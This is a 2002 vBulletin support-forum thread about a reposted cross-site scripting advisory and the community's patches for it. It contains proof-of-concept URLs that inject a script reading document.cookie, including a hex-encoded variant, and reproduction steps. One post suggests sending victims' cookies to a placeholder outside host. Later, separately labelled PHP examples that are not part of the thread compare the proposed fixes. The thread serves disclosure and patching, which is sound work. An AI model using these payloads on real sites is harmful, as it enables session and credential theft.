[fixed] vBulletin XSS Security Bug?


rebby
Fri 18th Oct '02, 2:53pm
Viewed via Bugtraq...


.:: vBulletin XSS Security Bug

vBulletin is a powerful and widely used bulletin board system, based on
the PHP language and a MySQL database. One of its features is the use of
templates to modify the board's look. I lately discovered a Cross-Site
Scripting vulnerability that would allow attackers to inject malicious code
and execute it in the client's browser.

+ Vulnerable Versions:

- Jelsoft vBulletin 2.2.8.
- Jelsoft vBulletin 2.2.7.
- Jelsoft vBulletin 2.2.6.
- Jelsoft vBulletin 2.2.5.
- Jelsoft vBulletin 2.2.4.
- Jelsoft vBulletin 2.2.3.
- Jelsoft vBulletin 2.2.2.
- Jelsoft vBulletin 2.2.1.
- Jelsoft vBulletin 2.2.0.
- Jelsoft vBulletin 2.0.2.
- Jelsoft vBulletin 2.0.1.
- Jelsoft vBulletin 2.0.0.
- Jelsoft vBulletin 2.0.0 Candidate 3.
- Jelsoft vBulletin 2.0.0 Candidate 2.
- Jelsoft vBulletin 2.0.0 Candidate 1.
- Jelsoft vBulletin 2.0.0 Beta 5.
- Jelsoft vBulletin 2.0.0 Beta 4.
- Jelsoft vBulletin 2.0.0 Beta 4.1.
- Jelsoft vBulletin 2.0.0 Beta 3.
- Jelsoft vBulletin 2.0.0 Beta 2.
- Jelsoft vBulletin 2.0.0 Beta 1.
- Jelsoft vBulletin 2.0.0 Alpha.

+ Details:

In global.php there is a variable [$scriptpath] whose value is the
referred URL that the client came from. Move on to admin/functions.php:
in the show_nopermission function, $scriptpath is pulled in as a global
variable. The content of the variable gets printed in the
error_nopermission_loggedin template without being filtered. So if we pass
some tags and script code in the URL and refresh the page, they will be
printed in the no-permission template. The same applies to the $url
variable, whose contents are printed in many templates.

+ Exploit:

Note: Tested on Microsoft Internet Explorer 6.0 and vBulletin.com:

- Go to usercp.php?s=[Session ID]"><Script>alert(document.cookie);</Script>
  [You can use it wherever error_nopermission_loggedin gets printed].
- A pop-up window will appear and you'll receive an error message.
- Then log in.
- Go back to the previous pages where you left the login form.
- Then the pop-up window will appear again, containing the User ID and
  Password Hash.

The same thing with $url templates.

+ Solution:

- Forum administrators can add code that checks the referred URL and
  filters its input, or upgrade to vBulletin 3.0.

+ Links:

- Http://www.vBulletin.com

Now I have to admit that I have not tried it (yet), but I would be interested in comments from the development team (who knows the codebase best)...

Steve Machol
Fri 18th Oct '02, 2:55pm
I tried it on my unhacked test forum and it didn't work.

rebby
Fri 18th Oct '02, 2:58pm
Originally posted by Steve Machol
I tried it on my unhacked test forum and it didn't work.

I'm assuming that is v2.2.8? That is a good thing to hear.

Steve Machol
Fri 18th Oct '02, 2:59pm
Yep, it was 2.2.8.

bigmattyh
Fri 18th Oct '02, 4:12pm
One clue that this report isn't all that valid is its suggestion to upgrade to vB3.

rebby
Fri 18th Oct '02, 5:16pm
Originally posted by bigmattyh
One clue that this report isn't all that valid is its suggestion to upgrade to vB3.

I saw that... :rolleyes:

Tommy Boy
Fri 18th Oct '02, 5:40pm
I'm not using 2.2.8, so I can't confirm if it's vulnerable or not, but if you want to be on the safe side, apply this one-line fix:

Open admin/functions.php, look for:

function show_nopermission() {
    global $bbtitle,$logincode,$url,$scriptpath,$bbuserinfo,$session;

After it, add:

$scriptpath = str_replace("\"", "", $scriptpath);

MUG
Fri 18th Oct '02, 6:03pm
I just tested this, and it does work...

Tommy Boy: htmlentities() would be better...

nuno
Fri 18th Oct '02, 6:19pm
Originally posted by MUG
I just tested this, and it does work...

Tommy Boy: urlencode() would be better...
vB version? :confused:

MUG
Fri 18th Oct '02, 6:23pm
Originally posted by nuno
vB version? :confused:

2.2.8.

Remember: you have to be logged out in order for the example posted to work.

(and &lt; should be replaced by <, &gt; replaced by >)

filburt1
Fri 18th Oct '02, 6:33pm
It sounds like it only returns your password hash :confused:

Tommy Boy
Fri 18th Oct '02, 6:36pm
Originally posted by MUG
Tommy Boy: urlencode() would be better...
Actually, both work, and even htmlspecialchars and htmlentities will work, but str_replace is the most efficient option. If you insist on being "logically" correct, you can use the following fix, but there is no reason for a vBulletin URL to include quotes in the first place, unless altered by a user...
$scriptpath = str_replace("\"", "%22", $scriptpath);

BTW: This only solves the $scriptpath templates, I'll leave the $url templates to the vb developers to fix. ;)
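As an added example that is not code from the advisory, the thread, or vBulletin: the $scriptpath data flow from the advisory's Details section, pushed through the treatments discussed so far (no filtering, the quote-stripping one-liner above, and htmlspecialchars) and checked with PHP's DOM parser as a stand-in for the browser. Both templates are hypothetical: the thread never shows the real error_nopermission_loggedin template, the payload's leading `">` implies a double-quoted attribute, and the text-context template is added to show where a quote-only fix stops working. The sample request path is constructed in the shape the advisory gives.

```php
<?php
// Added example (not vBulletin's code, not from the advisory): renders the
// same proof-of-concept request path through the treatments discussed in
// the thread and asks PHP's DOM parser, as a stand-in for the browser,
// whether a <script> element survives.

// HYPOTHETICAL templates. The first prints $scriptpath inside a
// double-quoted attribute (what the "> prefix of the payload targets);
// the second prints it as element text.
const TEMPLATE_ATTR = '<form><input type="hidden" name="url" value="$scriptpath"></form>';
const TEMPLATE_TEXT = '<p>No permission to view $scriptpath</p>';

// Constructed request path in the shape given in the advisory.
const SAMPLE_PATH = 'usercp.php?s=abc123"><Script>alert(document.cookie);</Script>';

// 1. Unfiltered, as in the affected versions.
function treat_none(string $scriptpath): string
{
    return $scriptpath;
}

// 2. Tommy Boy's one-liner: drop double quotes, nothing else.
function treat_strip_quotes(string $scriptpath): string
{
    return str_replace("\"", "", $scriptpath);
}

// 3. Entity-encode & < > " (Stadler's htmlspecialchars approach).
function treat_htmlspecialchars(string $scriptpath): string
{
    return htmlspecialchars($scriptpath, ENT_QUOTES);
}

// Stand-in for template interpolation of $scriptpath.
function render(string $template, string $scriptpath): string
{
    return str_replace('$scriptpath', $scriptpath, $template);
}

// True when the parsed document contains a script element, i.e. the
// injected tag escaped the context it was printed into.
function has_script_element(string $html): bool
{
    libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    libxml_clear_errors();
    return $doc->getElementsByTagName('script')->length > 0;
}

// Runs each treatment against both templates:
// [treatment => [context => script survived?]]
function evaluate_treatments(): array
{
    $treatments = [
        'none'             => 'treat_none',
        'strip_quotes'     => 'treat_strip_quotes',
        'htmlspecialchars' => 'treat_htmlspecialchars',
    ];
    $templates = ['attribute' => TEMPLATE_ATTR, 'text' => TEMPLATE_TEXT];
    $result = [];
    foreach ($treatments as $name => $fn) {
        foreach ($templates as $ctx => $tpl) {
            $result[$name][$ctx] = has_script_element(render($tpl, $fn(SAMPLE_PATH)));
        }
    }
    return $result;
}

foreach (evaluate_treatments() as $name => $contexts) {
    foreach ($contexts as $ctx => $survived) {
        printf("%-16s %-9s %s\n", $name, $ctx, $survived ? 'script survives' : 'inert');
    }
}
```

Run it with the php command-line binary. The unfiltered row shows a surviving script in both contexts; the quote-stripping row is inert in the attribute context but not in the text context, which is the gap MUG points at with htmlentities(): the one-liner closes the one template the proof of concept targets, while encoding holds wherever the value is printed.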

rylin
Fri 18th Oct '02, 6:39pm
Originally posted by filburt1
It sounds like it only returns your password hash :confused:

Correct, but what if someone makes the code visit some.other.domain/some.script.php?action=storeCookie&cookie=[your cookie here]? ;)

filburt1
Fri 18th Oct '02, 6:43pm
Ooh, that would be super major baddy bad :o

BTW I was able to get this to work on my forums. You have to replace the escaped characters with their equivalent actual chars (i.e., gt to >).

filburt1
Fri 18th Oct '02, 6:50pm
BTW Tommy Boy's fix worked on my board; I can't track down how to fix $url problems.

nuno
Fri 18th Oct '02, 7:01pm
Dang it :eek:
2.2.9 just around the corner, I guess :rolleyes:

Steve Machol
Fri 18th Oct '02, 8:56pm
Originally posted by MUG
2.2.8.

Remember: you have to be logged out in order for the example posted to work.

(and &lt; should be replaced by <, &gt; replaced by >)

Hmmm... it still doesn't work for me (using IE 6). I was logged out, I put my test domain into the 'trusted' zone and I even disabled my personal firewall. Nothing happens.

filburt1
Fri 18th Oct '02, 9:03pm
I got it to work by:

1. Logging out
2. Copying the URL into Notepad: usercp.php?s=[Session ID]"><Script>alert(document.cookie)</Script>
3. Replacing sessionid as appropriate
4. Copying the final URL and opening it in IE

And I get the nopermission screen but a Javascript popup showing the cookie values as well.

Edit: I have NAV and ZoneAlarm on and it still does this...at least until I applied Tommy Boy's fix.

nuno
Fri 18th Oct '02, 9:26pm
1. Log Out
2.

http://www.vbulletin.com/forum/usercp.php?s="><Script>alert(document.cookie);</Script>

3. Log in
4. Hit Back Twice

CeleronXT
Fri 18th Oct '02, 10:18pm
The fix worked on my board as well. Thanks. :)

Paul
Fri 18th Oct '02, 11:50pm
Holy wow--how did I miss this thread? :) Next time I'll wear my glasses before posting. Thanks TommyBoy for pointing it out to me.

Stadler
Sat 19th Oct '02, 12:17pm
And where's the security leak? Right now it just displays the contents of my local cookie, not more.

filburt1
Sat 19th Oct '02, 12:18pm
You can change it to embed code to send the cookies to another server (hence XSS) and store them remotely, thereby slowly collecting a list of userids and passhashes.

Stadler
Sat 19th Oct '02, 3:54pm
Well, OK, you're right.

Well I'd prefer the following fix:
---------==={OPEN THE FILE}===---------

forum/global.php

--------------==={FIND}===-------------

// get useful vars
$ipaddress=$REMOTE_ADDR;
$scriptpath=$REQUEST_URI;
if ($scriptpath=='') {
    if ($PATH_INFO) {
        $scriptpath = $PATH_INFO;
    } else {
        $scriptpath = $PHP_SELF;
    }

    if ($QUERY_STRING) {
        $scriptpath .= '?'.addslashes($QUERY_STRING);
    }
}

--------==={AFTER THAT, ADD}===--------

$scriptpath = htmlspecialchars($scriptpath);

--------------==={FIND}===-------------

$url = str_replace('$','',addslashes($url));

--------==={REPLACE IT WITH}===--------

$url = htmlspecialchars(str_replace('$','',addslashes($url)));

I think that would fix it, but I can't try it out right now. Could someone test it for me, please?

Stadler
Sat 19th Oct '02, 6:07pm
I've managed to test it now and it seems to work. Could a Dev check if it is a valid fix for this, please?

Scott MacVicar
Sat 19th Oct '02, 8:16pm
I'm edging towards a global XSS fix by removing all document.cookie from the output; though this will cause problems with people who post in forums, it's better to be safe than sorry.

functions.php

look for

if ($newpmmsg) {
    if (substr($PHP_SELF,-strlen('private.php'))=='private.php') {
    } else {
        $newtext=preg_replace("/<body/i","<body onload=\"Javascript:confirm_newpm()\"",$newtext);
    }
}

below it add

$newtext = preg_replace('/document.cookie/si', 'document_cookie', $newtext);

I'll still have to discuss it with some of the other devs, but if for some reason we don't use it then it will be what Stadler posted.

Paul
Sun 20th Oct '02, 8:18pm
Originally posted by PPN
I'm edging towards a global XSS fix by removing all document.cookie from the output; though this will cause problems with people who post in forums, it's better to be safe than sorry.


Well, now I'm curious ;)

What sort of problems will this cause with posting in forums? I'm trying to decide which fix to implement but would prefer not causing additional problems for users. :)

Thanks,
Paul

Scott MacVicar
Sun 20th Oct '02, 8:24pm
We went for the htmlspecialchars solution as you could potentially use eval("docum"+"ent.cookie"); to get round it.

Paul
Sun 20th Oct '02, 8:31pm
Thanks Scott :)

freaky
Sun 20th Oct '02, 11:37pm
Originally posted by PPN
We went for the htmlspecialchars solution as you could potentially use eval("docum"+"ent.cookie"); to get round it.

so use Stadler's fix?

nuno
Sun 20th Oct '02, 11:38pm
Yup :)

freaky
Sun 20th Oct '02, 11:39pm
Originally posted by nuno
Yup :)

yup to Stadler's fix? :) Just makin sure ....

is that the final fix or should we wait until this thread gets the [fixed] label?

Paul
Sun 20th Oct '02, 11:43pm
[fixed] is appended to the subject once the fix is applied in CVS, I believe. It doesn't mean that the developers will use the code supplied here, per se.

Stadler's fix removes the possibility of embedding special html characters and therefore prevents <script></script> from being used altogether. PPN's fix relies on the string "document.cookie", which as he pointed out, can be broken up with + signs.

Hope this helps,
Paul
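An added example, not the project's code, putting Scott's document.cookie rewrite and Stadler's htmlspecialchars fix side by side on the literal payload from the advisory and on the concatenated eval form Scott gave as the reason the rewrite was dropped. The template line, the script-body extraction and the literal-folding check are constructed here; the folding approximates what the browser's eval() assembles from adjacent string literals, which is exactly the text a post-render filter never sees.

```php
<?php
// Added example (not vBulletin's code): a blocklist on the rendered page
// versus encoding the untrusted value before it reaches the template.
// The two JavaScript spellings are the ones quoted in the thread; the
// template line and the checks are constructed for this demonstration.

// Scott's first proposal: scrub the finished page for the literal string.
function blocklist_filter(string $html): string
{
    return preg_replace('/document.cookie/si', 'document_cookie', $html);
}

// Stadler's proposal: encode the value before the template ever sees it.
function encode_untrusted(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES);
}

// Hypothetical template line standing in for wherever $scriptpath is printed.
function render(string $scriptpath): string
{
    return '<input type="hidden" name="url" value="' . $scriptpath . '">';
}

// Constructed inputs: the literal form from the advisory, and the
// concatenated form Scott cited as the reason the blocklist was dropped.
const INPUT_LITERAL = 'usercp.php?s=x"><Script>alert(document.cookie);</Script>';
const INPUT_CONCAT  = 'usercp.php?s=x"><Script>eval("docum"+"ent.cookie");</Script>';

// Collects the bodies of every <script> element left in the page.
function script_bodies(string $html): array
{
    preg_match_all('~<script\b[^>]*>(.*?)</script>~is', $html, $m);
    return $m[1];
}

// Joins adjacent string literals ("a"+"b" -> "ab"), which is what the
// browser's eval() ends up with; the blocklist only saw the unjoined text.
function fold_string_concats(string $js): string
{
    do {
        $before = $js;
        $js = preg_replace('~"([^"]*)"\s*\+\s*"([^"]*)"~', '"$1$2"', $js);
    } while ($js !== $before);
    return $js;
}

// True when some surviving script can still reach the cookie.
function can_read_cookie(string $html): bool
{
    foreach (script_bodies($html) as $body) {
        if (stripos(fold_string_concats($body), 'document.cookie') !== false) {
            return true;
        }
    }
    return false;
}

// Returns [input => [approach => cookie still readable?]].
function compare_fixes(): array
{
    $out = [];
    foreach (['literal' => INPUT_LITERAL, 'concat' => INPUT_CONCAT] as $name => $in) {
        $out[$name] = [
            'blocklist' => can_read_cookie(blocklist_filter(render($in))),
            'encode'    => can_read_cookie(render(encode_untrusted($in))),
        ];
    }
    return $out;
}

foreach (compare_fixes() as $name => $approaches) {
    foreach ($approaches as $fix => $readable) {
        printf("%-8s %-10s %s\n", $name, $fix, $readable ? 'cookie readable' : 'blocked');
    }
}
```

The blocklist row blocks the literal payload and passes the concatenated one, while the encode row has no script element left to inspect in either case: encoding removes the markup rather than guessing at the strings inside it, which is the reason Paul gives above for preferring Stadler's fix.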

DWZ
Mon 21st Oct '02, 2:32am
What happened to the general rule in computing that if you find a security bug, you report it to the software maker and if no action is taken within a few weeks they tell everyone about it so that script kiddies don't get to play around with it?

Scott MacVicar
Mon 21st Oct '02, 4:39am
Open global.php, look for:

    if ($QUERY_STRING) {
        $scriptpath .= '?'.addslashes($QUERY_STRING);
    }
}

below it add

$scriptpath = htmlspecialchars(str_replace('javascript', 'java script', $scriptpath));

look for

$url=$HTTP_SERVER_VARS['HTTP_REFERER'];

replace it with

$url = htmlspecialchars(str_replace('javascript', 'java script', $HTTP_SERVER_VARS['HTTP_REFERER']));

look for

$HTTP_POST_VARS['action'] = trim($HTTP_POST_VARS['action']);

below it add

$HTTP_GET_VARS['goto'] = htmlspecialchars(str_replace('javascript', 'java script', $HTTP_GET_VARS['goto']));

Stadler
Mon 21st Oct '02, 5:11am
Applied PPN's fix to our forums. Works like a charm. :)

Hellburn
Mon 21st Oct '02, 5:57am
Only the changes from PPN fix the bug? Must I only make the changes from PPN in functions.php and global.php? I don't need to make the fix from Tommy Boy, or?

Stadler
Mon 21st Oct '02, 6:06am
You don't need to modify functions.php, simply apply PPN's fix in his last message here to global.php. That's all.

DWZ
Mon 21st Oct '02, 6:45am
Originally posted by PPN
open global.php
look for...

Which one?

nuno
Mon 21st Oct '02, 6:54am
Forum folder global.php, not admin.

Stadler
Mon 21st Oct '02, 6:55am
Originally posted by DWZ
which one?

forum/global.php ;)

[Edit:]D'Oh. One minute too slow :o

Chris M
Mon 21st Oct '02, 9:28am
Is that the official fix?

Satan

nuno
Mon 21st Oct '02, 9:43am
It's a fix from one of the vB Dev Team members, that's more than enough for me. :o

Chris M
Mon 21st Oct '02, 10:53am
It appears to work without errors, so that's good enough for me!!!:D

Satan

Scott MacVicar
Mon 21st Oct '02, 12:13pm
That's the fix I committed to CVS and it will be in the next release.

Stadler
Mon 21st Oct '02, 12:15pm
That means, there will be a vBulletin 2.2.9, right? :o

Boothby
Mon 21st Oct '02, 1:34pm
What about hex-variables, e.g.

http://www.vbulletin.com/forum/usercp.php?s=%22%3e%3c%53%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3b%3c%2f%53%63%72%69%70%74%3e

John
Mon 21st Oct '02, 2:01pm
Try it, this forum is now running the fix. It should not affect it.

Reverend
Mon 21st Oct '02, 3:04pm
Am I right in assuming the updated global.php posted by John in "Announcements" uses a slight variation of PPN's fix?

So should we upload the new global.php, or will PPN's fix work the same?

Tommy Boy
Mon 21st Oct '02, 3:55pm
What's the point of having this?
str_replace('javascript', 'java script', $scriptpath)
As far as I see it, using htmlspecialchars should be enough, but even if it's not, this replace is worthless, as it's case sensitive...

Chris M
Mon 21st Oct '02, 4:18pm
It appears that John's global.php fix is cleaner than PPN's;)

Satan

Stadler
Mon 21st Oct '02, 5:52pm
Originally posted by Tommy Boy
What's the point of having this?
str_replace('javascript', 'java script', $scriptpath)
As far as I see it, using htmlspecialchars should be enough, but even if it's not, this replace is worthless, as it's case sensitive...

Well, I agree with it. Using the str_replace('javascript', 'java script', ...) part wouldn't make any difference. At least they should use eregi_replace instead.

Scott MacVicar
Mon 21st Oct '02, 6:39pm
It looks like John tidied it up a little :)

centris
Mon 21st Oct '02, 8:29pm
Running 2.2.6 here, will John's global.php be ok to use with that version or do you suggest I edit my current file? Thanks.

Steve Machol
Mon 21st Oct '02, 8:33pm
No. You'd need to upgrade to 2.2.8 to use that file.

centris
Mon 21st Oct '02, 9:12pm
OK, so do the edits provided by PPN work on 2.2.6, as this version is vulnerable to the exploit too? I am looking for a security fix here, not a full forum upgrade!

Paul
Mon 21st Oct '02, 9:20pm
Centris,

You would need to look at the code to see if it fits in. In all honesty, there have been a lot of code fixes since 2.2.6--I'd recommend waiting for 2.2.9 and to do a full upgrade to that.

If you have hacks installed, try a program like Araxis Merge or Beyond Compare to retain the changes you've made.

Paul

Paul
Mon 21st Oct '02, 9:23pm
Originally posted by Tommy Boy
What's the point of having this?
str_replace('javascript', 'java script', $scriptpath)
As far as I see it, using htmlspecialchars should be enough, but even if it's not, this replace is worthless, as it's case sensitive...

Good point. At least use strtolower().

Freddie Bingham
Mon 21st Oct '02, 9:30pm
preg_replace is preferable to ereg(i)_replace.

centris
Mon 21st Oct '02, 9:38pm
OK, the only edit that is not in the 2.2.6 script is:

$url=$HTTP_SERVER_VARS['HTTP_REFERER'];

Can this simply be left out? Comments would be appreciated.

Paul
Mon 21st Oct '02, 9:59pm
preg_replace frightens me ;)

In the meantime, I've made the following change (in all cases where the javascript replace is being done):

str_replace('javascript', 'java script', strtolower($scriptpath))

Paul
Tue 22nd Oct '02, 12:04am
It looks like the suggested fix breaks redirects after logging in:

http://www.vbulletin.com/forum/showthread.php?s=&threadid=57228

Edit: I've confirmed this problem on my forum as well. Any time a user logs in on a nopermission screen, this arises. Removing the htmlspecialchars() calls in the global.php "fix" resolves the issue. Would it be considered safe to only alter the javascript string? Is it possible that the addition of something like a hex backspace code could undo the space? Perhaps any occurrences of javascript should simply be removed? (i.e. str_replace('javascript', '', strtolower($string)))

Stadler
Tue 22nd Oct '02, 2:59am
I've applied PPN's Fix here (http://www.vbulletin.com/forum/showthread.php?postid=362889&action=showpost) on our Forums and the problem with amp; doesn't appear.

But I've just tried the global.php john posted and amp; appeared.

So I'd prefer applying PPN's fix.

Scott MacVicar
Tue 22nd Oct '02, 3:33am
Yep, it's doing htmlspecialchars twice.
Try this global.php

Paul
Tue 22nd Oct '02, 3:40am
Scott,

I'll upload this in a bit and try it out. I did notice that the xss_clean function only checks for "javascript" (not JAVASCRIPT or jAvAsCrIpT, etc.) Do you think you could incorporate the suggestion made previously with preg_replace or strtolower? I suppose that one could argue that with the < and > being replaced, that it doesn't matter, but then why check for 'javascript' at all?

Thanks :)
Paul

Scott MacVicar
Tue 22nd Oct '02, 3:47am
javascript:alert(document.cookie);

That's why :)

I'll use a regexp then.

Scott MacVicar
Tue 22nd Oct '02, 3:52am
Try this; I would convert all the replacements to a regexp, but str_replace is faster.

Paul
Tue 22nd Oct '02, 4:35am
Originally posted by PPN
Try this; I would convert all the replacements to a regexp, but str_replace is faster.

It seems to work--when attempting the exploit, it adds two slashes to the end of usercp.php which causes all the images to not load properly, but other than that--no popup ;) Serves them right not getting the images whilst trying to exploit the forum ;)

Thanks again Scott! :D

Scott MacVicar
Tue 22nd Oct '02, 4:56am
Doesn't add two slashes for me on my dev board.

Hellburn
Tue 22nd Oct '02, 8:12am
Which fix is now the official one? The fix from John or PPN?

Scott MacVicar
Tue 22nd Oct '02, 8:21am
The global.php file I attached; I'll get John to update his announcement when he is online.

Erwin
Tue 22nd Oct '02, 8:40am
Thanks PPN. Works fine. :)

Tommy Boy
Tue 22nd Oct '02, 11:14am
I like PPN's new fix.

BTW: This global.php should also work on 2.2.6 (it does on mine).

Smoothie
Tue 22nd Oct '02, 4:41pm
What's the deal here? Running 2.2.7. What specifically do I need to do with global.php?

Paul
Tue 22nd Oct '02, 4:57pm
Originally posted by Smoothie
What's the deal here? Running 2.2.7. What specifically do I need to do with global.php?

PPN's attached fix modifies the code to protect against a publicly released cross-site scripting vulnerability that exists in 2.2.8 and below. It's designed with 2.2.8 in mind and is a replacement for your existing <forum directory>/global.php (NOT global.php in /admin)

TommyBoy reported success using this global.php with his 2.2.6 forums, so I'd assume you'd be safe using this with 2.2.7. You might want to seriously consider upgrading though--there have been a number of fixes in between 2.2.7 and 2.2.8.

Use a program like Araxis Merge or Beyond Compare to see what's changed between your global.php and this new one.

Paul

Smoothie
Tue 22nd Oct '02, 5:02pm
I'd rather know what to find and replace in global.php rather than uploading a new file.

Paul
Tue 22nd Oct '02, 5:12pm
Originally posted by Smoothie
I'd rather know what to find and replace in global.php rather than uploading a new file.

Which is where the programs I mentioned in my last post come in. :rolleyes:

The Prohacker
Tue 22nd Oct '02, 6:08pm
Originally posted by Smoothie
I'd rather know what to find and replace in global.php rather than uploading a new file.


Find:

unset($vars);

Below, add:

function xss_clean ($var) {
    $var = preg_replace( '/javascript/i', 'java script', $var );
    $var = str_replace( '"', '&quot;', $var );
    $var = str_replace( '<', '&lt;', $var );
    return str_replace( '>', '&gt;', $var );
}



Find:

$scriptpath=$REQUEST_URI;

Replace with:

$scriptpath = xss_clean( $REQUEST_URI );

Find:

$scriptpath .= '?'.addslashes($QUERY_STRING);

Replace with:

$scriptpath .= '?'.addslashes( xss_clean( $QUERY_STRING ) );

Find:

$url = str_replace('$','',addslashes($url));

Replace with:

$url = str_replace( '$', '', addslashes( xss_clean( $url ) ) );

Find:

$HTTP_POST_VARS['action'] = trim($HTTP_POST_VARS['action']);

Below, add:

if ( isset( $goto ) ) {
    $goto = xss_clean( $goto );
}



Those are the differences between the 2.2.8 /global.php and the posted /global.php

I've already been through and upgraded several vBs with the same fix today...
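An added example that exercises the xss_clean() posted above (reproduced from the thread) against Scott's earlier case-sensitive str_replace edit and against a bare htmlspecialchars() pass. It checks the two properties argued over in this thread: Tommy Boy's point that a case-sensitive replace misses mixed-case input, and the "amp;" problem Stadler and Scott traced to htmlspecialchars being applied twice. The inputs are constructed, and the four-argument htmlspecialchars() call needs PHP 5.2.3 or later, which did not exist when the thread was written.

```php
<?php
// Added example (not vBulletin's code): checks two properties of the
// xss_clean() posted in this thread. Inputs are constructed.

// Reproduced from The Prohacker's post above.
function xss_clean($var)
{
    $var = preg_replace('/javascript/i', 'java script', $var);
    $var = str_replace('"', '&quot;', $var);
    $var = str_replace('<', '&lt;', $var);
    return str_replace('>', '&gt;', $var);
}

// Scott's earlier global.php edit, kept for comparison: str_replace is
// case-sensitive, so only lower-case "javascript" is rewritten.
function clean_case_sensitive($var)
{
    return htmlspecialchars(str_replace('javascript', 'java script', $var));
}

// htmlspecialchars with double_encode=false (PHP 5.2.3+): entities that
// already exist, such as &quot;, are left alone on a second pass.
function clean_no_double_encode($var)
{
    return htmlspecialchars($var, ENT_QUOTES, 'UTF-8', false);
}

// Constructed inputs.
const MIXED_CASE = 'index.php?goto=JaVaScRiPt:alert(1)';
const WITH_QUOTE = 'usercp.php?s=abc"><b>x</b>';

// Does a javascript: scheme survive the cleaner, ignoring case?
function scheme_survives(callable $cleaner, string $input): bool
{
    return preg_match('/javascript:/i', $cleaner($input)) === 1;
}

// A cleaner applied at two layers (global.php plus a template, say) must
// give the same result as one application; otherwise users see &amp;quot;.
function is_stable(callable $cleaner, string $input): bool
{
    $once = $cleaner($input);
    return $cleaner($once) === $once;
}

// Summary of both properties for each cleaner.
function report(): array
{
    $cleaners = [
        'str_replace (case-sensitive)'      => 'clean_case_sensitive',
        'xss_clean'                         => 'xss_clean',
        'htmlspecialchars'                  => 'htmlspecialchars',
        'htmlspecialchars, double_encode=0' => 'clean_no_double_encode',
    ];
    $out = [];
    foreach ($cleaners as $name => $fn) {
        $out[$name] = [
            'mixed_case_scheme_survives' => scheme_survives($fn, MIXED_CASE),
            'stable_when_applied_twice'  => is_stable($fn, WITH_QUOTE),
        ];
    }
    return $out;
}

foreach (report() as $name => $props) {
    printf("%-34s scheme survives: %-5s stable twice: %s\n",
        $name,
        var_export($props['mixed_case_scheme_survives'], true),
        var_export($props['stable_when_applied_twice'], true));
}
```

Two rows are worth reading together. xss_clean is the only cleaner above that both catches the mixed-case scheme and is stable when applied twice; it stays stable because it never touches `&`, so a second pass finds nothing left to encode. A plain htmlspecialchars() turns the `&` of `&quot;` into `&amp;` on the second pass, which is the symptom reported with John's earlier global.php; on current PHP the double_encode flag gives htmlspecialchars the same stability without giving up `&` encoding.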

Smoothie
Tue 22nd Oct '02, 6:32pm
@The Prohacker-

Is that the same for (2.2.7) global.php, which is what I'm running?

Smoothie
Tue 22nd Oct '02, 6:33pm
Originally posted by LoveShack
Which is where the programs I mentioned in my last post come in. :rolleyes:

Those proggies don't run on a Mac, last time I checked. :(

Arsenik
Tue 22nd Oct '02, 7:36pm
Originally posted by Smoothie
Those proggies don't run on a Mac, last time I checked. :(
You should consider getting "Virtual PC". We have Macs at my job and we use it to be able to work on MS Access.

http://www.connectix.com/products/vpc5m.html

centris
Tue 22nd Oct '02, 7:47pm
What is Jelsoft's official position regarding security with the various versions of vBulletin? We have here a very public exploit, several fixes, one seems to break something else, and a very confused user with an owner licence. My 2.2.6 scripts are dated 26 July 2002, 14:46:12, say 12 weeks old, so I hardly view my version of vBulletin as OLD and out of date. I am not in a position to update at this time either, so that is not an option.

Scott MacVicar
Tue 22nd Oct '02, 7:48pm
The fix that has been used in CVS and is now in John's announcement is the one that The Prohacker has posted the differences for.

Smoothie
Tue 22nd Oct '02, 8:00pm
The question is still not answered. Will this fix work with older versions? 2.2.7?

Stadler
Tue 22nd Oct '02, 8:24pm
Originally posted by Smoothie
The question is still not answered. Will this fix work with older versions? 2.2.7?

Originally posted by Tommy Boy
I like PPN's new fix.

BTW: This global.php should also work on 2.2.6 (it does on mine).

This means, yes ^^

Well, if your version is older than that, you could try to apply what The Prohacker has posted. But I myself prefer to upgrade to 2.2.9, though it's some work to reapply all the hacks again.

IDN
Wed 23rd Oct '02, 12:21am
So what does this allow?

Chris M
Wed 23rd Oct '02, 8:34am
You don't need to do that...

Just download Araxis Merge or Beyond Compare (I used BC)...

I have loads of hacks installed on my site (http://www.darkblazes.com/)

I updated manually from 2.2.6 to 2.2.8 a few weeks ago, and I encountered no problems!:)

Satan

GTI-R Kid
Sun 27th Oct '02, 5:23pm
Do I replace all global.php files with the new one?

<-- newbie to it all here.

nuno
Sun 27th Oct '02, 5:38pm
http://www.vbulletin.com/forum/showthread.php?s=&threadid=57203
only forum/global.php ;)

GTI-R Kid
Sun 27th Oct '02, 5:39pm
Thanks for the rescue nuno :)

mishkan
Sun 3rd Nov '02, 4:18pm
Newbie question...

I downloaded the fixed global.php file, and its size on my computer is 11,266. I uploaded it to my board, and its size there is 10,894. Why would it be a different size? Did I do something wrong? Thanks.

Steve Machol
Sun 3rd Nov '02, 5:27pm
It should be the same size. Make sure you download and upload in ASCII, and that you overwrite the one on the server.

Scott MacVicar
Sun 3rd Nov '02, 5:32pm
I find that the sizes don't equal what it says on my disk, but only in some FTP clients. Main difference is WSFTP and Cute FTP.

Babylon
Sun 3rd Nov '02, 6:27pm
I think (taking a guess here) it's because the server you are uploading the file to is probably UNIX and you are using windows. They have a slightly different way of sorting files (such as line breaks). I'm probably being misled though! :p

mishkan
Mon 4th Nov '02, 1:12am
Originally posted by Steve Machol
It should be the same size. Make sure you download and upload in ASCII, and that you overwrite the one on the server.
After I downloaded the global.php file, I was able to open it in MS Notepad, and it looks okay... not gibberish. So, I downloaded it in ASCII, not binary. Right?

And I'm positive that I uploaded in ASCII. Just to be absolutely sure, I set the transfer mode to ASCII only... and then uploaded the global.php file. The file sizes still don't match.

Originally posted by PPN
I find that the sizes don't equal what it says on my disk, but only in some FTP clients. Main difference is WSFTP and Cute FTP.

All the other php files, which I downloaded in the 2.2.8 upgrade zip file and then uploaded to the server, match sizes exactly. That is, they are the same size on my computer as on the server. Only the global.php file that I downloaded, as the XSS bug fix, doesn't match. I use SSH Secure Shell FTP, from ssh.com, instead of WS_FTP or Cute FTP.

Originally posted by Babylon
I think (taking a guess here) it's because the server you are uploading the file to is probably UNIX and you are using windows. They have a slightly different way of sorting files (such as line breaks). I'm probably being misled though! :p

Yes, it's a UNIX server, not Windows. But if this was the cause, I would think it would affect all the php files, not just the global.php file.

